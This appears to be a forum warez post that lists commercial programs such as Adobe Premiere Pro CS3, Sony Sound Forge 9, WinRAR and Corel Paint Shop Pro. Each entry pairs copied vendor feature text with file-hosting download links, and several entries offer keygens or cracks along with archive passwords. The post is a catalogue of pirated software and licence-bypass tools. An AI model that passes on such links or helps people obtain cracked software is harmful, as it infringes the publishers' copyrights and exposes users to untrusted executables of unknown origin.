Quickly convert 100 file formats to pdf including searchable Word(doc) to PDF, Excel(xls) to PDF,PowerPoint(ppt) to PDF, TXT to PDF, PSD to PDF , DWF to PDF, EMF to PDF , TIF to PDF , PNG to PDF , GIF to PDF , PCD to PDF , PSP to PDF , EPS to PDF , TGA to PDF , BMP to PDF , ICO to PDF,DWG to PDF, DXF to PDF, CMW to PDF, IMG to PDF, IFF to PDF, J2K to PDF, JP2 to PDF, Jpeg to PDF, Html to PDF, WMF to PDF, DCR to PDF, PPM to PDF, PTK to PDF, PCD to PDF, JBG to PDF and many more. PDF Converter Pro Converter makes file conversion to PDF.



Download:-


Code:
http://rapidshare.com/files/93436758/Abdio_PDF_Converter_Pro_v6.1.rar

Real Player v.11.0.9.372 Gold Premium

Real Player v.11.0.9.372 Gold Premium


Download:-

Code:
http://rapidshare.com/files/100153853/RPlayer_11.0.9.372_GP_upsmack.rar

Removable Media Data Recovery Software v3.0.1.5

Removable Media Data Recovery Software v3.0.1.5





Removable media data recovery software repair rescue restore recover and retrieve lost missing deleted formatted corrupted files folders Mp3 Photo songs images music pictures video digital photo from thumb drive, pen drive, external hard disk drive, removable drive, compact flash memory card, multimedia card, SD card, micro drive, smart drive media, removable flash card memory, Smart Media, Compact Multimedia card, memory card, USB and other Equivalent Devices.

:: Easiest and quick software utility tool for restoration of any type of media files folders including JPG JPEG TIF GIF RiFF TIFF AVI PNG BMP 3gp MPEG MOV WAV MIDI QuickTime or any other file type stored in your removable media.
:: Supports all type of Removable media including compact flash memory card, multimedia card, SD card, microdrive, smart drive media, removable flash card memory, Smart Media, Compact Multimedia card, memory card, USB and other equivalent devices.
:: Recovers Data even if DRIVE NOT FORMATTED message is displayed while accessing your media on PC.
:: Easiest Data retrieval software to restore lost music, photos and video (including wmv), undeleting deleted songs, recover corrupted deleted formatted or damaged thumb drive, pen drive, external hard disk Drive, removable drive, compact flash memory card, multimedia card, SD card, smart drive media, removable flash card memory, Smart Media, Compact Multimedia card, memory card, USB and other Equivalent Devices.
:: Retrieve and Restore corrupted files and folders damaged due to human error or any Virus Generated Data Loss.
:: Easiest Data retrieval software to restore lost data, recover formatted or damaged files before you fix and repair your corrupted storage device.

Download:-



Code:
http://w14.easy-share.com/1699517250.html

WhiteSmoke? 2008

WhiteSmoke? 2008


WhiteSmoke? is a patented English writing editor that automatically works with any text based application and enables your plain English sentences to become correct, professional and impressive.

Check the table below for special prices, discounts and coupons.



Take Your Writing to the Next Level:


Patented grammar checker


Advanced spell checker


Unique text enrichment


Massive English dictionary


Synonyms and idioms dictionary


Translator (18 Languages)


Free English experts forum



Free writing guides (Over 600)


Free English lessons

Info:
A Complete Suite of English Writing Tools:
Grammar Check
Spell Check
Text Enrichment
Punctuation Check
Proofreading & Editing
Writing Templates
English Dictionary
Thesaurus for Synonyms

An Ideal Solution For:
Letter Writing
Business Writing
Essay Writing
Legal Writing
Creative Writing
Email Writing
Blogging
Instant Messaging

How Does It Work?
WhiteSmoke improves your English grammar and writing. In the demo below, look at the color-coded enhancements and see the improvement.
Red: spell check results.
Green: English grammar corrections.
Blue and purple: enrichment suggestions.


Download:-

Code:
http://rapidshare.com/files/97591628/WhiteSmoke.2008.rar

Sony Sound Forge 9.0e

Sony Sound Forge 9.0e


The Sound Forge 9 professional digital audio production suite includes everything you need to quickly get from raw audio to finished master. Use this suite to create and edit stereo and multichannel audio files with speed and precision. Efficiently analyze, record and edit audio, digitize and restore old recordings, model acoustic environments, design sound for multimedia, and master replication-ready CDs.

Includes Tools for Sound Design and Mastering
In addition to Sound Forge 9 software, this comprehensive audio production suite includes CD Architect 5 software for designing, mastering and burning Red Book audio CDs, Noise Reduction 2 plug-ins to fix common audio problems such as tape hiss, camera hum, clicks, and pops, and the Mastering Effects Bundle powered by iZotope™, a collection of four professional audio plug-ins.

Stereo and Multichannel Recording
Sound Forge 9 software has a complete set of tools for recording audio. Record straight into your sound card or use the Record Timer to begin and end a session at a specific time and date. Alternatively, you can start recording when a certain audio threshold is reached with Threshold Record Triggering. You can also now record and edit multichannel audio files as easily as stereo files.

Precise Audio Editing
Edit stereo and native multichannel audio files down to the sample level in real time. Use familiar Windows commands to cut, copy, paste, mix, and crossfade audio. Drag and drop to edit between channels, and work on one file while processing others in the background.

Pristine Sound Quality
Sound Forge software supports full resolution 24-bit and 32-bit/64-bit float 192 kHz files for the ultimate in audio fidelity. Capture the subtle overtones and nuances of instruments, vocals, and effect changes.

Powerful Effects Processing
Apply over 40 professional studio effects and processes including Normalize, EQ, Delay, Chorus, Volume, Dynamics, Noise Gate, Pitch Shift, Flange, and Vibrato. Chain multiple effects together and apply them to selections or entire files using the Plug-in Chainer. Sound Forge 9 software also supports DirectX and VST effects, including parameter automation, to expand the number of effects you can apply to audio and increase your mastering flexibility.

Audio-for-Video
Sound Forge 9 software supports multiple video formats including AVI, WMV, and MPEG-1 and MPEG-2. Synchronize audio and video frame by frame. Import Flash (SWF) files* to visually synchronize your audio to your project. Sound Forge 9 software includes MPEG-2 templates for writing HDV-compliant files at both 720p and 1080i resolutions. Also included are templates for encoding WMV 720p and 1080p.

Dolby Digital AC-3 export
Use Sound Forge 9 software to export multichannel files in surround AC-3 format using the included Dolby Digital AC-3 plug-in.

What's new in version 9.0:-

* Multichannel audio editing and recording.
* Updated Channel Converter for multichannel files.
* Updated Spectrum Analysis for multichannel files.
* Drag-and-drop mixing and pasting between channels.
* Hardware Meters window for monitoring hardware outputs and adjusting preview levels.
* Phase scope and mono-compatibility meter.
* You can now cut, paste, and delete data from individual channels of multichannel files.
* You can now update the cursor position and selection by double-clicking and editing the selection status boxes in data windows.
* Improved process and effects dialogs with selection, wet/dry mix, fade-in/out controls.
* Adjust data window selections/crossfades when process and effects dialogs are visible.
* Enhanced snapping.
* Enhanced color customization via Display Preferences.
* Enhanced keyboard customization.
* Updated marker and region ruler with selection snapping.
* Gracenote? MusicID™ technology for extracted audio from CDs.


=====================================
Notable fixes/changes in version 9.0e
=====================================

* Fixed a bug that could cause the Wave Hammer and Acoustic Mirror plug-ins to revert to Demo mode.
* Fixed a bug that caused the Cut and Copy toolbar buttons to be unavailable after making a selection.
* Fixed a bug that caused the Loop Tuner window to ignore vertical zooming and panning in the data window.


File Info:-

File Name: Sony-Sound-Forge-90e-NoPE-gHanchi2oOo.rar
File Size: 77539 KB
File Type: rar
Official WebSite:


Code:
http://www.sonycreativesoftware.com/soundforgeDownload:-


Code:
http://rapidshare.com/files/112665570/Sony-Sound-Forge-90e-NoPE-gHanchi2oOo.rar

Sony DVD Architect Studio 4.5

Sony DVD Architect Studio 4.5


Nothing beats DVD Architect software for professional DVD authoring. Its clean, drag-and-drop interface and powerful layout and authoring tools make it easy to develop dynamic menu-based DVDs, movies, picture slideshows, and music compilations. Included with the Vegas+DVD Production Suite, DVD Architect software works seamlessly within the Vegas environment. Sony Media Software proudly introduces DVD Architect software, your one-stop shop for authoring and burning DVDs.


Features:-

• Import audio, video, and stills from an extensive range of formats
• Easy to use menu-based and drag-and-drop interface for DVD design and authoring
• DVD movie creation
• Create picture slide shows and music compilations
• Still and motion menu creation
• Text editing and shadow effects
• NTSC and PAL in standard (4:3) and widescreen (16:9) formats
• Add, edit, and move chapter points
• Adjustable project and file optimization settings
• Virtual remote to preview the final project before burning to DVD
• View “safe grid areas” to ensure proper image and button placement
• Customizable Themes
• Get started right away and learn as you go with interactive Show Me How tutorials
• Supports a wide variety of DVD burners

Download:-


Code:
http://rapidshare.com/files/113446208/SonDVDArchStud4.5c_www.smforum.net.rar.html

GoldWave 5.25

GoldWave 5.25


GoldWave is is a top rated, a comprehensive digital audio editor. GoldWave is ideal for people who work with audio for CD editing, archive restoration, speech analysis, radio and TV, Java and Web pages, games, or just for fun. You can use it to make everything from elaborate answering machine messages to professional, high quality CD audio content.


Features:
? Play, edit, mix, and analyze audio
? Record audio from cassettes, vinyl records, radio, etc. through your computer’s line-in
? Record dictation through a microphone or play dictation back at a slower speed for transcription
? Record and edit audio for podcasting
? Apply special effects, such as fade, equalizer, doppler, mechanize, echo, reverse, flanger, and more
? Digitally remaster and restore old recordings with noise reduction and pop/click filters
? Make perfect digital copies of audio CD tracks using the CD Reader tool and save them in wma, mp3, ogg files
? Edit music for dance programs, figure skating, gymnastics
? Analyze human speech, bird song, whale song
? Demonstrate digital signal processing with filter effects and the expression evaluator tool
? View a variety of real-time visuals and VU meters
? Convert files to/from different formats, such as wav, wma, mp3, ogg, aiff, au, vox and even raw binary

Download:-


Code:
http://rapidshare.com/files/113297901/GoldWave.v5.25.incl.keygen_zyberakuma.rar

Winrar 3.71

Winrar 3.71



WinRAR is a powerful archive manager. It can backup your data and reduce size of email attachments, decompress RAR, ZIP and other files downloaded from Internet and create new archives in RAR and ZIP file format.

download:


Code:
http://rapidshare.com/files/112551203/WinRAR_3.71_With_DYNAT_Keygen.rar.html

Power Data Recovery 4.1.1

Power Data Recovery 4.1.1



Power Data Recovery is a powerful data recovery software developed by MT Solution Ltd. Since the first release of version 1.0 in 2003 we have had many happy customers around the world. It is one of the fastest and most effective programs of the data recovery software. Power Data Recovery is becoming the first choice when you need data recovery software to help you recover your lost data.

Power Data Recovery is a read-only File Recovery Software and Data Recovery Software. Power data recovery software could help you recover all your data no matter the data is lost by accidental deletion, format, re-partition, system crash or virus attack. Power data recovery is able to scan your device sector by sector to recover what ever left on your device.

Power Data Recovery provide deep scan module which can scan and analyze raw data format including Microsoft Office files, digital graphics/pictures, audio/video files. Please visit deep scan page for complete raw file format list.

Feature overview

* Recover data after accidental deletion
* Recover data after an accidental format
* Recover data from an inaccessible volume (logical drive)
* Recover data after FAT corruption
* Recover data after repartition (fdisk)
* Recover data from a crashed physical device
* Recover data after an MBR corruption
* Recover data from a hard disk drive, camera card, USB drive, Zip, floppy disk
* Recover data for any error except physical damage

Key Features

* Supports FAT 12/16/32
* Supports NTFS
* Supports NTFS compressed and encrypted files
* Supports Dynamic Volume including Simple Volume, Spanned Volume, Stripe Volume, Mirror Volume and Raid Volume.
* Supports RAW data recovery
* Built-in preview function
* Built-in resume recovery function
* Built-in Recovery Wizard

Download:-


Code:
http://rapidshare.com/files/96461879/Power_Data_Recovery_4.1.1_www.cw-network.info_FOT9.rar
--------------------------------------------------------------------------------

Ultra ISO Premium Edition 9.1.2.2465

Ultra ISO Premium Edition 9.1.2.2465


UltraISO is an ISO CD/DVD image file creating/editing/converting tool and a bootable CD/DVD maker, it can directly edit the CD/DVD image file and extract files and folders from it, as well as directly make ISO files from your CD/DVD-ROM or hard disk. At the same time, you can maintain the ISO bootable information, thus creating your own bootable CD/DVDs. You now have the power to make and edit your own ISO files, and then burn them to CD/DVD for your own needs.

UltraISO Can Do
1. Duplicate disc to ISO file from CD-ROM.
2. Build file on hard disk, CD-ROM, net drive to one ISO file.
3. Extract files from ISO file.
4. Edit ISO file in many format (such as Nero burning ROM, Easy CD Creator, CDRWin, CloneCD, BlindWrite, etc.).
5. Make bootable ISO file.
6. Create/Edit Audio CD image.

Download:-


Code:
http://rapidshare.com/files/112934110/UltraISO.Premium.Edition.v9.1.2.2465.rar

Adobe Premiere Pro CS3

Adobe Premiere Pro CS3


Create high-quality visual and editorial effects directly within the editing timeline. Generate slow motion and other time-remapping effects with precise keyframe control and real-time feedback. Add color correction, lighting and other effects, audio filters, and more with fast, flexible, built-in tools. Edit footage from multicam shoots with ease and precision.


Download:-


Code:
http://rapidshare.com/files/37554964/APPCS3.part1.rar
http://rapidshare.com/files/37554706/APPCS3.part2.rar
http://rapidshare.com/files/37570485/APPCS3.part3.rar
http://rapidshare.com/files/37579433/APPCS3.part4.rar
http://rapidshare.com/files/37579610/APPCS3.part5.rar
http://rapidshare.com/files/37585145/APPCS3.part6.rar
http://rapidshare.com/files/37592069/APPCS3.part7.rarKeygen:-


Code:
http://rapidshare.com/files/82714958/Adobe_Premiere_Crack.rar.htmlPassword:-


Code:
IllEffector

Adobe Premiere Pro CS3 (DIRECT LINK) Speed AVERAGE 2000kbs

Create high-quality visual and editorial effects directly within the editing timeline. Generate slow motion and other time-remapping effects with precise keyframe control and real-time feedback. Add color correction, lighting and other effects, audio filters, and more with fast, flexible, built-in tools. Edit footage from multicam shoots with ease and precision.
Comprehensive video-format compatibility

Work with the formats you want. Edit all standard- or high-definition formats, from DV and HDV to HD and beyond (some formats may require additional hardware).
Broad range of supporting hardware and software for Mac and Windows

Create DVD and Blu-ray Discs with Adobe Encore CS3 software, now included with Adobe Premiere Pro CS3. Work with the same Adobe Encore authoring interface and features used to create standard-definition DVDs. Author once, deliver to three formats: automatically convert your high-definition Blu-ray Disc projects into standard-definition DVDs and interactive versions for the web.
Superior integration with other Adobe applications

Make the leading still and motion graphics applications, Adobe Photoshop® and After Effects, part of an efficient post-production workflow. Import and animate Photoshop layers. Automatically create Photoshop files that match the current project’s frame size and aspect ratio. Drag and drop or copy and paste clips and timelines between Adobe Premiere Pro CS3 and After Effects CS3 Professional.
Direct-to-disk recording with included Adobe OnLocation CS3* (Windows only)

Save tape and time by eliminating capture from your production process. Record SD and HD video directly to hard disk using Adobe OnLocation™ CS3 software, included with Adobe Premiere Pro CS3. Instantly review each shot without shuttling tape. Adobe OnLocation automatically detects and flags problems to provide the best results.
Professional on-set monitoring with Adobe OnLocation CS3.


Maximize camera image quality during shoots by using Adobe OnLocation CS3 to quickly calibrate your camera, check levels, and monitor your signal. Use simple tools that function like their hardware equivalents to get results quickly and easily. The virtual reference monitor, waveform monitor, vectorscope, and audio spectrum analyzer help you avoid problems and improve quality when shooting.
Delivery to the web and mobile devices

Make your video viewable on the delivery platforms of today and tomorrow. Export as SWF FLV files. Easily convert DVD projects complete with menus to SWF for web playback. Encode for delivery to cell phones and other mobile devices, and emulate playback on those devices to check playback quality.

Improved editing efficiency

Work faster with powerful and flexible editing tools. Play video with nested audio sequences in real time without rendering. Replace any clip in the timeline with a new clip while preserving the replaced clip’s editing attributes and settings. Use shortcuts to switch between workspace panels and save time.
Accelerated client review and approval with Adobe Clip Notes

Expedite review cycles and avoid miscommunication with Adobe Clip Notes. Embed video into a PDF file, e-mail the file to your client to review and add timecode-specific comments, and then view comments mapped to the Adobe Premiere Pro CS3 timeline.
Image
KeyGen (required for activation)

Code:
http://rapidshare.com/files/85323489/APPCS3bysidishere.rar

password:

Code:
a4f1exsid1ec

Image
SETUP ONLY speeds average 2000kps (2 megabytes per sec)



Code:
https://www.adobe.com/cfusion/tdrc/index.cfm?promoid=BONQV&product=premiere%5Fpro

Corel Paint Shop Pro Photo X2

Corel Paint Shop Pro Photo X2


New Corel? Paint Shop Pro? Photo X2 is the ideal choice for any aspiring photographer's digital darkroom. It's filled with everything from easy automatic photo fixes to precision editing tools. It even includes a built-in Learning Center to help new users get started right away!


Download:-


Code:
http://rapidshare.com/files/104889906/Corel_Paint_Shop_Pro_X2_12__2B_Keygen.part1.rar
http://rapidshare.com/files/104889966/Corel_Paint_Shop_Pro_X2_12__2B_Keygen.part2.rar
http://rapidshare.com/files/104889979/Corel_Paint_Shop_Pro_X2_12__2B_Keygen.part3.rar
http://rapidshare.com/files/104889852/Corel_Paint_Shop_Pro_X2_12__2B_Keygen.part4.rar

PDF to Word v3.0

PDF to Word v3.0 ■ 3.75MB



PDF2Word (PDF to Word) software exports the text, images and other contents from any PDF document into MS Word document format (RTF or Word), so you can edit and reuse your PDF content. PDF2Word (PDF to Word) preserves the original PDF text, layout and bitmap images inthe generated Word document. PDF2Word (PDF to Word) software is a standalone program and does not require Microsoft Word, Adobe Acrobat, or even Acrobat Reader.


PDF to Word/RTF Features and Interface:-

- Convert PDF files into Microsoft Word documents;
- Batch PDF to Word conversion - convert multiple documents at once;
- Standalone software, MS Word, Adobe Acrobat and Reader NOT required!
- Support Command Line Operation (for manual use or inclusion in scripts);
- Support Win98/ME/NT/2000/XP/2003/Vista platforms;
- Automatically resize PDF page to fit your required Word page size;
- Accurately preserve text, pictures, and layout of the original PDF;
- PDF to Word is easy to use;
- Support multiple documents conversion (Batch Processing);
- Support drag and drop PDF files for conversion;
- Support PDF1.6 file format (formerly supported only by Adobe Acrobat 7.0);
- Converted files can be automatically loaded immediately after conversion is complete;
- Support page range conversion (all, from-to, individual pages);
- Support English, French, German, Italian, Chinese Simplified, Chinese Traditional, Czech, Danish, Dutch, Japanese, Korean, Norwegian, Polish, Portuguese, Russian, Spanish, Swedish, etc.
- languages;
- Support deletion of graphics and pictures from the generated Word document;
- Support encrypted PDF file conversion;
- Five reconstruction modes for PDF to Word conversion;
- Convert PDF file to flowing MS Word document without text boxes.

Download:-


Code:
http://rapidshare.com/files/113338778/PDF2Word_v3.0.rar




IDM Ultra Edit Plus 14.00

IDM Ultra Edit Plus 14.00


UltraEdit is a powerful disk-basked text editor, programmer's editor, and hex editor that is used to edit HTML, PHP, javascript, Perl, C/C++, and a multitude of other coding/programming languages. UltraEdit can handle and edit files in excess of 4 gigabytes. An industry award winning application, UltraEdit includes a free trial period so users may try the fully functional application before buying a license.

This page contains a list of all features in the application. Related features are grouped into different categories - simply click on a category to jump to those features.


Some features may link to a related Power Tip, which provides a tutorial for using the feature.

* Key text editing features
* Programmer's features
* Database handling features
* File management features
* Printing features
* Text editing features (HTML, CSS, etc.)
* Search and replace features
* Project/workspace features
* Editor display and customization features
* Formatting features (text, XML, etc.)
* Column/block editing features
* Macro and scripting features
* Advanced configurable features
* Window management features
* Help and support features
* Additional features
* Hex editor features

Download:-


Code:
http://rapidshare.com/files/113581508/IDM_UltraEdit_v14.00_Plus_1.rar

NVIDIA PureVideo Decoder v1.02-233

NVIDIA PureVideo Decoder v1.02-233


Today?s consumers demand superb picture clarity, stutter-free playback and multiple display connectivity options.


The best way to achieve this is with NVIDIA? PureVideo? technology.
Watch DVD movies and videos on your desktop PC, notebook PC, or HDTV without the annoying artifacts and imperfections of traditional PC-based video solutions. NVIDIA PureVideo technology is the combination of a dedicated video processing core on the NVIDIA GPU and software in the NVIDIA? ForceWare? drivers that delivers superb video with minimal CPU utilization and low power consumption.
H.264, WMV, and MPEG-2 Hardware Acceleration
NVIDIA PureVideo provides ultra-smooth playback of H.264, WMV and MPEG-2 HD and SD videos with minimal CPU usage.

Download:-


Code:
http://rapidshare.com/files/90125395/NpVD102233.zip